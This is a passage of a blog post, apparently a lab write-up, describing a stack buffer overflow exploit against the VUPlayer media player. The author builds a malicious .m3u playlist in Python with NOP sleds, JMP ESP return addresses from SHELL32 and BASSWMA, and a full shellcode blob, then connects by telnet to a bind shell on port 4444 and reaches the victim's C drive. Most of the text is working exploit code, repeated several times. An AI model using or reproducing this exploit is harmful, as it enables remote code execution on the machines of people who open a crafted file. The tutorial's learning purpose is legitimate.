"\x7d\x75\x3e\xee\x1e\x01\xad\x34\xfb\x9e\x6b\x08\x88\xdd\x76\x08"
"\x8f\xf2\xf2\xa7\x97\x87\x5a\x17\xa9\x7c\x2d\xdc\x9d\x09\xaf\x0c"
"\xec\xcd\x29\x7c\x8b\x0e\x3d\x7b\x55\x44\xb3\x82\x97\xb2\x38\xbf"
"\x43\x61\xe9\xca\x8e\xe2\xb6\x10\x50\x1e\x2e\xd3\x5e\xab\x24\xbc"
"\x42\x2a\xd0\x41\x57\xa7\xaf\x29\x83\xab\xce\x72\xfa\x08\x74\xff"
"\xbe\x9e\xfe\xbf\x4c\x54\x70\x23\xe0\xe1\x31\x53\xa4\x9d\x3f\x2d"
"\x56\xb2\x10\x4e\xb0\x2c\xc2\xd6\x55\x82\xd6\x7e\xd1\x97\x24\x21"
"\x49\xa7\x99\xb5\xba\xba\xe6\x7e\x6d\xba\xc1\xdf\x04\xa1\x88\x5e"
"\xfb\x22\x57\x35\x6e\x31\xa8\x65\x06\xec\x5f\x70\x7a\x59\x9f\xac"
"\xd6\x35\x0c\x03\x8a\xfa\xe1\xe0\x7f\x02\xd5\x80\x17\xed\x8a\x2a"
"\xbb\x84\xd2\x27\x53\x33\x0e\x37\x63\x6c\xd0\x61\x01\x83\x7f\xd8"
"\x29\x73\x17\x46\x78\x5a\x01\xd1\x7c\x75\x82\x88\x7d\xaa\x4d\xd7"
"\xcb\xcd\xc7\x40\x33\x07\x87\x3a\x9f\xfd\xd7\x12\x8c\x96\xc0\xeb"
"\x75\x1f\x58\xf4\xac\xb5\x99\xda\x37\x5c\x02\xbc\xdf\xc3\xa7\xc9"
"\xc5\x6e\x68\x90\x2c\xa3\x01\xc5\x45\x7f\x9b\xeb\xab\xbf\x68\x41"
"\x35\x7d\xa2\x6b\x88\xae\x2f\x1e\x77\x97\xe4\x8b\x23\x8f\x88\x35"
"\x80\x46\x92\xbc\xa3\x99\xba\x65\x7b\x34\x12\xc8\xd2\xd2\x95\xbb"
"\x85\x77\xc7\xc4\xf6\x10\x4a\xe3\xf2\x2e\xc7\xec\x2b\xc4\x17\xed"
"\xe3\xe6\x38\x9a\x5b\xe5\x3a\x58\x07\xea\xeb\x32\x37\xc4\x7c\xcc"
"\x1f\x07\x0f\x63\x5f\x1e\x0f\x53")
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
file="yuza.m3u"
junk="\x90" * 1012
junk+="\xD7\x30\x9D\x7C"
junk+="\x90" * 32
junk+=("\xbf\x67\x14\xbd\x7d\x2b\xc9\xda\xc5\xb1\x51\xd9\x74\x24\xf4\x5e"
"\x31\x7e\x10\x03\x7e\x10\x83\xa1\x10\x5f\x88\xd1\x73\x74\x3e\xc1"
"\x7d\x75\x3e\xee\x1e\x01\xad\x34\xfb\x9e\x6b\x08\x88\xdd\x76\x08"
"\x8f\xf2\xf2\xa7\x97\x87\x5a\x17\xa9\x7c\x2d\xdc\x9d\x09\xaf\x0c"
"\xec\xcd\x29\x7c\x8b\x0e\x3d\x7b\x55\x44\xb3\x82\x97\xb2\x38\xbf"
"\x43\x61\xe9\xca\x8e\xe2\xb6\x10\x50\x1e\x2e\xd3\x5e\xab\x24\xbc"
"\x42\x2a\xd0\x41\x57\xa7\xaf\x29\x83\xab\xce\x72\xfa\x08\x74\xff"
"\xbe\x9e\xfe\xbf\x4c\x54\x70\x23\xe0\xe1\x31\x53\xa4\x9d\x3f\x2d"
"\x56\xb2\x10\x4e\xb0\x2c\xc2\xd6\x55\x82\xd6\x7e\xd1\x97\x24\x21"
"\x49\xa7\x99\xb5\xba\xba\xe6\x7e\x6d\xba\xc1\xdf\x04\xa1\x88\x5e"
"\xfb\x22\x57\x35\x6e\x31\xa8\x65\x06\xec\x5f\x70\x7a\x59\x9f\xac"
"\xd6\x35\x0c\x03\x8a\xfa\xe1\xe0\x7f\x02\xd5\x80\x17\xed\x8a\x2a"
"\xbb\x84\xd2\x27\x53\x33\x0e\x37\x63\x6c\xd0\x61\x01\x83\x7f\xd8"
"\x29\x73\x17\x46\x78\x5a\x01\xd1\x7c\x75\x82\x88\x7d\xaa\x4d\xd7"
"\xcb\xcd\xc7\x40\x33\x07\x87\x3a\x9f\xfd\xd7\x12\x8c\x96\xc0\xeb"
"\x75\x1f\x58\xf4\xac\xb5\x99\xda\x37\x5c\x02\xbc\xdf\xc3\xa7\xc9"
"\xc5\x6e\x68\x90\x2c\xa3\x01\xc5\x45\x7f\x9b\xeb\xab\xbf\x68\x41"
"\x35\x7d\xa2\x6b\x88\xae\x2f\x1e\x77\x97\xe4\x8b\x23\x8f\x88\x35"
"\x80\x46\x92\xbc\xa3\x99\xba\x65\x7b\x34\x12\xc8\xd2\xd2\x95\xbb"
"\x85\x77\xc7\xc4\xf6\x10\x4a\xe3\xf2\x2e\xc7\xec\x2b\xc4\x17\xed"
"\xe3\xe6\x38\x9a\x5b\xe5\x3a\x58\x07\xea\xeb\x32\x37\xc4\x7c\xcc"
"\x1f\x07\x0f\x63\x5f\x1e\x0f\x53")
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
Then i run that script again and then
execute the m3u file that have been created by that script with VUPlayer without ollydbg. And the VUPlayer was crash. Last, i run a telnet with a command telnet 192.168.56.101 4444 in my Backtrack Console and i got the result like this
Finally, i've succes to exploit this application from the module SHELL 32. But to get the correct payload, i must try to generate the payload repeteadly. I don't know why it can be happen. I think that's because the bad character. I have running the telnet but i found and connection refused like this
After the connection closed. The application is directly closed.
After the connection closed. The application is directly closed.
Next, i want to try to exploit from the address JMP ESP from the module BASSWMA. First i search the JMP ESP address from that module.
Next i modification again my script
#!usr/bin/python
file="yuza.m3u"
junk="\x90" * 1012
junk+="\x9F\x53\x10\x10"
junk+="\x90" * (1016-len(junk))
junk+="\xCC" * (10000-len(junk))
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
file="yuza.m3u"
junk="\x90" * 1012
junk+="\x9F\x53\x10\x10"
junk+="\x90" * (1016-len(junk))
junk+="\xCC" * (10000-len(junk))
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
Then i run that script again and then
execute the m3u file that have been created by that script with VUPlayer and ollydbg.
Well, it success. Next i modification my fuzzer script again and insert the payload that i'have use in JMP ESP of shell32 module.
#!usr/bin/python
file="yuza.m3u"
junk="\x90" * 1012
junk+="\x9F\x53\x10\x10"
junk+="\x90" * 32
junk+=("\xbf\x67\x14\xbd\x7d\x2b\xc9\xda\xc5\xb1\x51\xd9\x74\x24\xf4\x5e"
"\x31\x7e\x10\x03\x7e\x10\x83\xa1\x10\x5f\x88\xd1\x73\x74\x3e\xc1"
"\x7d\x75\x3e\xee\x1e\x01\xad\x34\xfb\x9e\x6b\x08\x88\xdd\x76\x08"
"\x8f\xf2\xf2\xa7\x97\x87\x5a\x17\xa9\x7c\x2d\xdc\x9d\x09\xaf\x0c"
"\xec\xcd\x29\x7c\x8b\x0e\x3d\x7b\x55\x44\xb3\x82\x97\xb2\x38\xbf"
"\x43\x61\xe9\xca\x8e\xe2\xb6\x10\x50\x1e\x2e\xd3\x5e\xab\x24\xbc"
"\x42\x2a\xd0\x41\x57\xa7\xaf\x29\x83\xab\xce\x72\xfa\x08\x74\xff"
"\xbe\x9e\xfe\xbf\x4c\x54\x70\x23\xe0\xe1\x31\x53\xa4\x9d\x3f\x2d"
"\x56\xb2\x10\x4e\xb0\x2c\xc2\xd6\x55\x82\xd6\x7e\xd1\x97\x24\x21"
"\x49\xa7\x99\xb5\xba\xba\xe6\x7e\x6d\xba\xc1\xdf\x04\xa1\x88\x5e"
"\xfb\x22\x57\x35\x6e\x31\xa8\x65\x06\xec\x5f\x70\x7a\x59\x9f\xac"
"\xd6\x35\x0c\x03\x8a\xfa\xe1\xe0\x7f\x02\xd5\x80\x17\xed\x8a\x2a"
"\xbb\x84\xd2\x27\x53\x33\x0e\x37\x63\x6c\xd0\x61\x01\x83\x7f\xd8"
"\x29\x73\x17\x46\x78\x5a\x01\xd1\x7c\x75\x82\x88\x7d\xaa\x4d\xd7"
"\xcb\xcd\xc7\x40\x33\x07\x87\x3a\x9f\xfd\xd7\x12\x8c\x96\xc0\xeb"
"\x75\x1f\x58\xf4\xac\xb5\x99\xda\x37\x5c\x02\xbc\xdf\xc3\xa7\xc9"
"\xc5\x6e\x68\x90\x2c\xa3\x01\xc5\x45\x7f\x9b\xeb\xab\xbf\x68\x41"
"\x35\x7d\xa2\x6b\x88\xae\x2f\x1e\x77\x97\xe4\x8b\x23\x8f\x88\x35"
"\x80\x46\x92\xbc\xa3\x99\xba\x65\x7b\x34\x12\xc8\xd2\xd2\x95\xbb"
"\x85\x77\xc7\xc4\xf6\x10\x4a\xe3\xf2\x2e\xc7\xec\x2b\xc4\x17\xed"
"\xe3\xe6\x38\x9a\x5b\xe5\x3a\x58\x07\xea\xeb\x32\x37\xc4\x7c\xcc"
"\x1f\x07\x0f\x63\x5f\x1e\x0f\x53")
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
file="yuza.m3u"
junk="\x90" * 1012
junk+="\x9F\x53\x10\x10"
junk+="\x90" * 32
junk+=("\xbf\x67\x14\xbd\x7d\x2b\xc9\xda\xc5\xb1\x51\xd9\x74\x24\xf4\x5e"
"\x31\x7e\x10\x03\x7e\x10\x83\xa1\x10\x5f\x88\xd1\x73\x74\x3e\xc1"
"\x7d\x75\x3e\xee\x1e\x01\xad\x34\xfb\x9e\x6b\x08\x88\xdd\x76\x08"
"\x8f\xf2\xf2\xa7\x97\x87\x5a\x17\xa9\x7c\x2d\xdc\x9d\x09\xaf\x0c"
"\xec\xcd\x29\x7c\x8b\x0e\x3d\x7b\x55\x44\xb3\x82\x97\xb2\x38\xbf"
"\x43\x61\xe9\xca\x8e\xe2\xb6\x10\x50\x1e\x2e\xd3\x5e\xab\x24\xbc"
"\x42\x2a\xd0\x41\x57\xa7\xaf\x29\x83\xab\xce\x72\xfa\x08\x74\xff"
"\xbe\x9e\xfe\xbf\x4c\x54\x70\x23\xe0\xe1\x31\x53\xa4\x9d\x3f\x2d"
"\x56\xb2\x10\x4e\xb0\x2c\xc2\xd6\x55\x82\xd6\x7e\xd1\x97\x24\x21"
"\x49\xa7\x99\xb5\xba\xba\xe6\x7e\x6d\xba\xc1\xdf\x04\xa1\x88\x5e"
"\xfb\x22\x57\x35\x6e\x31\xa8\x65\x06\xec\x5f\x70\x7a\x59\x9f\xac"
"\xd6\x35\x0c\x03\x8a\xfa\xe1\xe0\x7f\x02\xd5\x80\x17\xed\x8a\x2a"
"\xbb\x84\xd2\x27\x53\x33\x0e\x37\x63\x6c\xd0\x61\x01\x83\x7f\xd8"
"\x29\x73\x17\x46\x78\x5a\x01\xd1\x7c\x75\x82\x88\x7d\xaa\x4d\xd7"
"\xcb\xcd\xc7\x40\x33\x07\x87\x3a\x9f\xfd\xd7\x12\x8c\x96\xc0\xeb"
"\x75\x1f\x58\xf4\xac\xb5\x99\xda\x37\x5c\x02\xbc\xdf\xc3\xa7\xc9"
"\xc5\x6e\x68\x90\x2c\xa3\x01\xc5\x45\x7f\x9b\xeb\xab\xbf\x68\x41"
"\x35\x7d\xa2\x6b\x88\xae\x2f\x1e\x77\x97\xe4\x8b\x23\x8f\x88\x35"
"\x80\x46\x92\xbc\xa3\x99\xba\x65\x7b\x34\x12\xc8\xd2\xd2\x95\xbb"
"\x85\x77\xc7\xc4\xf6\x10\x4a\xe3\xf2\x2e\xc7\xec\x2b\xc4\x17\xed"
"\xe3\xe6\x38\x9a\x5b\xe5\x3a\x58\x07\xea\xeb\x32\x37\xc4\x7c\xcc"
"\x1f\x07\x0f\x63\x5f\x1e\x0f\x53")
file=open(file,'w')
file.write(junk)
print ("berhasil membuat file")
file.close()
Then i run that script again and then
execute the m3u file that have been created by that script with VUPlayer without ollydbg and well the application was crash too. Next i try to run telnet from my Backtrack and its succesfull to access the drive C in windows.
Note: I have try to use the vpl and cue file to execute from VUPlayaer but the application was not crash. It nothings happen to that application.
No comments:
Post a Comment